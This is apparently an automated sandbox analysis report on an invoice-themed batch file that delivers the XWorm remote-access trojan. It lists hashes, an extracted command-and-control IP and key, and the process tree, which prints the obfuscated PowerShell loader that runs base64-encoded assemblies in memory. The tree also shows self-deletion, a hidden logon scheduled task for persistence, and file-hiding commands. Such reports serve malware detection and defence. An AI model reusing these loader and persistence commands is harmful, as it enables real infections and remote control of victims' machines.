Resubmissions
09-04-2024 17:39
240409-v8jxlahb3v 1025-03-2024 14:18
240325-rmr5asae55 1020-03-2024 19:31
240320-x8t4nsgg65 1020-03-2024 18:56
240320-xlp67sga73 1018-03-2024 12:37
240318-pt1c5she4x 10Analysis
-
max time kernel
364s -
max time network
388s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
20-03-2024 18:56
Static task
static1
General
-
Target
INVOICE-02417869_77319135.bat
-
Size
304KB
-
MD5
6d6b6c679309bd938dbcaada6f7820dd
-
SHA1
ccb02a27885c656c2c52dc94272b91d46c46ac7c
-
SHA256
e1e32a7e5096ea1ad664b321e1bd1603761e28e3b63025fa02078361545894fd
-
SHA512
7c2317cf54a96bde7d0cb3d1ed9afdc91e1d35835bcdcab24b56d8bd3c8c3a8320c97c90267a2171d72919c9b6a89e845582f66e76e3354c23f79f5560645032
-
SSDEEP
1536:eN2lxmAHlCvI8H41j/KnDTBpRcuNoCSsXDht/lFqz5FWJYDzqGHRBWZbgbLxihFZ:eN2lZhSIj/crDhFrq9FFDnl3AIdWOC
Malware Config
Extracted
xworm
5.0
38.146.219.228:7000
4l7KI6LtRV2tYmxG
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/memory/4400-92-0x00000235EA1B0000-0x00000235EA1BE000-memory.dmp family_xworm behavioral1/memory/4048-110-0x00000222354E0000-0x00000222354F0000-memory.dmp family_xworm -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000\Control Panel\International\Geo\Nation startup_str_865.bat.exe Key value queried \REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000\Control Panel\International\Geo\Nation INVOICE-02417869_77319135.bat.exe Key value queried \REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 2 IoCs
pid Process 1048 INVOICE-02417869_77319135.bat.exe 4400 startup_str_865.bat.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000_Classes\Local Settings INVOICE-02417869_77319135.bat.exe -
Suspicious behavior: EnumeratesProcesses 17 IoCs
pid Process 1048 INVOICE-02417869_77319135.bat.exe 1048 INVOICE-02417869_77319135.bat.exe 396 powershell.exe 396 powershell.exe 396 powershell.exe 2196 powershell.exe 2196 powershell.exe 396 powershell.exe 396 powershell.exe 2196 powershell.exe 4400 startup_str_865.bat.exe 4400 startup_str_865.bat.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1048 INVOICE-02417869_77319135.bat.exe Token: SeDebugPrivilege 396 powershell.exe Token: SeDebugPrivilege 2196 powershell.exe Token: SeIncreaseQuotaPrivilege 2196 powershell.exe Token: SeSecurityPrivilege 2196 powershell.exe Token: SeTakeOwnershipPrivilege 2196 powershell.exe Token: SeLoadDriverPrivilege 2196 powershell.exe Token: SeSystemProfilePrivilege 2196 powershell.exe Token: SeSystemtimePrivilege 2196 powershell.exe Token: SeProfSingleProcessPrivilege 2196 powershell.exe Token: SeIncBasePriorityPrivilege 2196 powershell.exe Token: SeCreatePagefilePrivilege 2196 powershell.exe Token: SeBackupPrivilege 2196 powershell.exe Token: SeRestorePrivilege 2196 powershell.exe Token: SeShutdownPrivilege 2196 powershell.exe Token: SeDebugPrivilege 2196 powershell.exe Token: SeSystemEnvironmentPrivilege 2196 powershell.exe Token: SeRemoteShutdownPrivilege 2196 powershell.exe Token: SeUndockPrivilege 2196 powershell.exe Token: SeManageVolumePrivilege 2196 powershell.exe Token: 33 2196 powershell.exe Token: 34 2196 powershell.exe Token: 35 2196 powershell.exe Token: 36 2196 powershell.exe Token: SeIncreaseQuotaPrivilege 2196 powershell.exe Token: SeSecurityPrivilege 2196 powershell.exe Token: SeTakeOwnershipPrivilege 2196 powershell.exe Token: SeLoadDriverPrivilege 2196 powershell.exe Token: SeSystemProfilePrivilege 2196 powershell.exe Token: SeSystemtimePrivilege 2196 powershell.exe Token: SeProfSingleProcessPrivilege 2196 powershell.exe Token: SeIncBasePriorityPrivilege 2196 powershell.exe Token: SeCreatePagefilePrivilege 2196 powershell.exe Token: SeBackupPrivilege 2196 powershell.exe Token: SeRestorePrivilege 2196 powershell.exe Token: SeShutdownPrivilege 2196 powershell.exe Token: SeDebugPrivilege 2196 powershell.exe Token: SeSystemEnvironmentPrivilege 2196 powershell.exe Token: SeRemoteShutdownPrivilege 2196 powershell.exe Token: SeUndockPrivilege 2196 powershell.exe Token: SeManageVolumePrivilege 2196 powershell.exe Token: 33 2196 powershell.exe Token: 34 2196 powershell.exe Token: 35 2196 powershell.exe Token: 36 2196 powershell.exe Token: SeIncreaseQuotaPrivilege 2196 powershell.exe Token: SeSecurityPrivilege 2196 powershell.exe Token: SeTakeOwnershipPrivilege 2196 powershell.exe Token: SeLoadDriverPrivilege 2196 powershell.exe Token: SeSystemProfilePrivilege 2196 powershell.exe Token: SeSystemtimePrivilege 2196 powershell.exe Token: SeProfSingleProcessPrivilege 2196 powershell.exe Token: SeIncBasePriorityPrivilege 2196 powershell.exe Token: SeCreatePagefilePrivilege 2196 powershell.exe Token: SeBackupPrivilege 2196 powershell.exe Token: SeRestorePrivilege 2196 powershell.exe Token: SeShutdownPrivilege 2196 powershell.exe Token: SeDebugPrivilege 2196 powershell.exe Token: SeSystemEnvironmentPrivilege 2196 powershell.exe Token: SeRemoteShutdownPrivilege 2196 powershell.exe Token: SeUndockPrivilege 2196 powershell.exe Token: SeManageVolumePrivilege 2196 powershell.exe Token: 33 2196 powershell.exe Token: 34 2196 powershell.exe -
Suspicious use of WriteProcessMemory 22 IoCs
description pid Process procid_target PID 1572 wrote to memory of 1048 1572 cmd.exe 89 PID 1572 wrote to memory of 1048 1572 cmd.exe 89 PID 1048 wrote to memory of 396 1048 INVOICE-02417869_77319135.bat.exe 94 PID 1048 wrote to memory of 396 1048 INVOICE-02417869_77319135.bat.exe 94 PID 1048 wrote to memory of 1868 1048 INVOICE-02417869_77319135.bat.exe 96 PID 1048 wrote to memory of 1868 1048 INVOICE-02417869_77319135.bat.exe 96 PID 1048 wrote to memory of 2196 1048 INVOICE-02417869_77319135.bat.exe 98 PID 1048 wrote to memory of 2196 1048 INVOICE-02417869_77319135.bat.exe 98 PID 1868 wrote to memory of 1540 1868 cmd.exe 100 PID 1868 wrote to memory of 1540 1868 cmd.exe 100 PID 1048 wrote to memory of 3204 1048 INVOICE-02417869_77319135.bat.exe 102 PID 1048 wrote to memory of 3204 1048 INVOICE-02417869_77319135.bat.exe 102 PID 3204 wrote to memory of 2932 3204 WScript.exe 103 PID 3204 wrote to memory of 2932 3204 WScript.exe 103 PID 2932 wrote to memory of 4400 2932 cmd.exe 105 PID 2932 wrote to memory of 4400 2932 cmd.exe 105 PID 4400 wrote to memory of 4048 4400 startup_str_865.bat.exe 108 PID 4400 wrote to memory of 4048 4400 startup_str_865.bat.exe 108 PID 4400 wrote to memory of 4280 4400 startup_str_865.bat.exe 109 PID 4400 wrote to memory of 4280 4400 startup_str_865.bat.exe 109 PID 4280 wrote to memory of 792 4280 cmd.exe 112 PID 4280 wrote to memory of 792 4280 cmd.exe 112 -
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 1540 attrib.exe 792 attrib.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\INVOICE-02417869_77319135.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1572 -
C:\Users\Admin\AppData\Local\Temp\INVOICE-02417869_77319135.bat.exe"C:\Users\Admin\AppData\Local\Temp\INVOICE-02417869_77319135.bat.exe" -noprofile -w hidden -ep bypass -command $h1dden_6PX4R4EI97 = [System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\INVOICE-02417869_77319135.bat').Split([Environment]::NewLine); foreach ($h1dden_5CTWVIXP39 in $h1dden_6PX4R4EI97) { $h1dden_GWJZ79AQLX = [System.Text.RegularExpressions.Regex]::Replace('_0', '0', ' '); $h1dden_GWJZ79AQLX = [System.Text.RegularExpressions.Regex]::Replace($h1dden_GWJZ79AQLX, '_', 'NC9JF6XBBE9W'); if ($h1dden_5CTWVIXP39 -match $h1dden_GWJZ79AQLX) { $h1dden_9ETDMIF4K6 = [System.Text.RegularExpressions.Regex]::Replace($h1dden_5CTWVIXP39, 'NC9JF6XBBE9W', ''); $h1dden_9ETDMIF4K6 = [System.Text.RegularExpressions.Regex]::Replace($h1dden_9ETDMIF4K6, '#', '/'); $h1dden_9ETDMIF4K6 = [System.Text.RegularExpressions.Regex]::Replace($h1dden_9ETDMIF4K6, '@', 'A');break; }; }; if ($h1dden_9ETDMIF4K6.Contains('GHQGYADXBYSPMVIMBZELCEYKCDTGAZ')) { $h1dden_9ETDMIF4K6 = [System.Text.RegularExpressions.Regex]::Replace($h1dden_9ETDMIF4K6, 'GHQGYADXBYSPMVIMBZELCEYKCDTGAZ', ''); } else { exit }; $h1dden_6H4D035AJI = [string[]]$h1dden_9ETDMIF4K6.Split('!'); $h1dden_8BPQJS0IX6 = [System.Convert]::FromBase64String($h1dden_6H4D035AJI[0]); $h1dden_GZP997YC33 = [System.Reflection.Assembly]::Load($h1dden_8BPQJS0IX6); $h1dden_SU6ND0HM0P = $h1dden_GZP997YC33.EntryPoint; $h1dden_SU6ND0HM0P.Invoke($null, $null); $h1dden_D2APD5ZCTP = [System.Convert]::FromBase64String($h1dden_6H4D035AJI[1]); $h1dden_R7HO2DCETZ = [System.Reflection.Assembly]::Load($h1dden_D2APD5ZCTP); $h1dden_XZ8OZOMAPF = $h1dden_R7HO2DCETZ.EntryPoint; $h1dden_XZ8OZOMAPF.Invoke($null, $null)2⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1048 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(1048);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:396
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ATTRIB +H "C:\Users\Admin\AppData\Local\Temp\INVOICE-02417869_77319135.bat.exe" & exit3⤵
- Suspicious use of WriteProcessMemory
PID:1868 -
C:\Windows\system32\attrib.exeATTRIB +H "C:\Users\Admin\AppData\Local\Temp\INVOICE-02417869_77319135.bat.exe"4⤵
- Views/modifies file attributes
PID:1540
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_865_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_865.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2196
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_865.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3204 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_865.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:2932 -
C:\Users\Admin\AppData\Roaming\startup_str_865.bat.exe"C:\Users\Admin\AppData\Roaming\startup_str_865.bat.exe" -noprofile -w hidden -ep bypass -command $h1dden_6PX4R4EI97 = [System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Roaming\startup_str_865.bat').Split([Environment]::NewLine); foreach ($h1dden_5CTWVIXP39 in $h1dden_6PX4R4EI97) { $h1dden_GWJZ79AQLX = [System.Text.RegularExpressions.Regex]::Replace('_0', '0', ' '); $h1dden_GWJZ79AQLX = [System.Text.RegularExpressions.Regex]::Replace($h1dden_GWJZ79AQLX, '_', 'NC9JF6XBBE9W'); if ($h1dden_5CTWVIXP39 -match $h1dden_GWJZ79AQLX) { $h1dden_9ETDMIF4K6 = [System.Text.RegularExpressions.Regex]::Replace($h1dden_5CTWVIXP39, 'NC9JF6XBBE9W', ''); $h1dden_9ETDMIF4K6 = [System.Text.RegularExpressions.Regex]::Replace($h1dden_9ETDMIF4K6, '#', '/'); $h1dden_9ETDMIF4K6 = [System.Text.RegularExpressions.Regex]::Replace($h1dden_9ETDMIF4K6, '@', 'A');break; }; }; if ($h1dden_9ETDMIF4K6.Contains('GHQGYADXBYSPMVIMBZELCEYKCDTGAZ')) { $h1dden_9ETDMIF4K6 = [System.Text.RegularExpressions.Regex]::Replace($h1dden_9ETDMIF4K6, 'GHQGYADXBYSPMVIMBZELCEYKCDTGAZ', ''); } else { exit }; $h1dden_6H4D035AJI = [string[]]$h1dden_9ETDMIF4K6.Split('!'); $h1dden_8BPQJS0IX6 = [System.Convert]::FromBase64String($h1dden_6H4D035AJI[0]); $h1dden_GZP997YC33 = [System.Reflection.Assembly]::Load($h1dden_8BPQJS0IX6); $h1dden_SU6ND0HM0P = $h1dden_GZP997YC33.EntryPoint; $h1dden_SU6ND0HM0P.Invoke($null, $null); $h1dden_D2APD5ZCTP = [System.Convert]::FromBase64String($h1dden_6H4D035AJI[1]); $h1dden_R7HO2DCETZ = [System.Reflection.Assembly]::Load($h1dden_D2APD5ZCTP); $h1dden_XZ8OZOMAPF = $h1dden_R7HO2DCETZ.EntryPoint; $h1dden_XZ8OZOMAPF.Invoke($null, $null)5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4400 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(4400);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;6⤵
- Suspicious behavior: EnumeratesProcesses
PID:4048
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ATTRIB +H "C:\Users\Admin\AppData\Roaming\startup_str_865.bat.exe" & exit6⤵
- Suspicious use of WriteProcessMemory
PID:4280 -
C:\Windows\system32\attrib.exeATTRIB +H "C:\Users\Admin\AppData\Roaming\startup_str_865.bat.exe"7⤵
- Views/modifies file attributes
PID:792
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5661739d384d9dfd807a089721202900b
SHA15b2c5d6a7122b4ce849dc98e79a7713038feac55
SHA25670c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
SHA51281b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8
-
Filesize
1KB
MD54d1969fa5f066db3e8ea5693cc9a1718
SHA13f630883efe81b6f1d3cf1fec526237fe4202334
SHA2560069835519f12f37ead8f308e96d8c90ea09e081a94a941c1f8921fe6e1834ce
SHA5124f74412265a1b11826f18e58bfc6b59c006914dd2acb74045dffca775cb1fb620605233f5c5fc7b03fe50433e99dba4e4bd1b4afc012cfc8f0214d1dedcfb88d
-
Filesize
1KB
MD538626e78f952256a721176512a7f8c26
SHA170636067d2b0ec031d6912faba82a8665fa54a08
SHA256ce79b9265cd36fec49cda6c92664354a8b6448bcf28bc13ff8b318b3b80c756d
SHA51249005e71061285d59144a8551bb9b317694a64b383c64ec6e3c34308371a95b8fbac7356c2a8eb15477030f9aee10b347bca4f95601ba4b262eb3df0ec22c0d2
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
304KB
MD56d6b6c679309bd938dbcaada6f7820dd
SHA1ccb02a27885c656c2c52dc94272b91d46c46ac7c
SHA256e1e32a7e5096ea1ad664b321e1bd1603761e28e3b63025fa02078361545894fd
SHA5127c2317cf54a96bde7d0cb3d1ed9afdc91e1d35835bcdcab24b56d8bd3c8c3a8320c97c90267a2171d72919c9b6a89e845582f66e76e3354c23f79f5560645032
-
Filesize
115B
MD50176220b5570dde769d9f38f297c5c02
SHA1dbb79f787092784b6fb63ed1ba7e44e6764c3f3d
SHA2562d65a8c5a7b12b5e9cee886b3dc49cce94cfc2e18b4850e2a012f83940372fca
SHA512f6a84a657c59d9395374f44c92c917b781d99ce3ef488877ef04b3582cae979a44c926826f7938d5484ab10aa2c9a0312b4c4b1fc8cbf0f8d8fcdba68a9d3ed4